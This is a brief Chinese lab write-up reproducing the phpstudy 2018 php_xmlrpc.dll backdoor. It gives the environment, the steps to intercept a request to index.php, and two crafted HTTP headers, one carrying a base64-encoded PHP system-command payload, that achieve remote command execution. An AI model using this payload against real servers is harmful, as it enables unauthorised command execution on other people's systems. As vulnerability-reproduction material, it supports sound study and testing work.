phpstudyphp_xmlrpc.dll后门漏洞复现搭建环境:
phpstudy2018
php版本5.4
漏洞影响版本:5.2/5.4
漏洞利⽤
1、随便访问⼀个存在的php⽂件 我这⾥就访问index.php好了
用phpstudy搭建网站2、进⾏index.php 进⾏抓包 再⾃⾏添加两个字段payload 执⾏系统命令
Accept-Charset: ZWNobyBzeXN0ZW0oJ3dob2FtaScpOw==
Accept-Encoding: gzip,deflate